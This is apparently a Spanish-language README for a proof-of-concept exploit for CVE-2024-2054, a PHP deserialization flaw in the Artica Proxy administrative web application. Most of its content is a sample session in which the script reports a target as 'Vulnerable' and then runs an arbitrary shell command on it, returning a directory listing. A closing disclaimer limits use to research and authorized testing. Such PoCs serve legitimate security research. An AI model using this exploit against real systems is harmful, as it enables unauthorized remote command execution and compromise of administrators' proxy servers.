
Una prueba de concepto de exploit para la aplicación web administrativa ARTICA PROXY CVE-2024-2054
Más detalles aquí: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Esta POC ha sido creada puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está pensada para atacar sistemas salvo que se cuente con autorización explícita. Los creadores/mantenedores del proyecto no son responsables del mal uso del software/POC. Úsalo de manera responsable.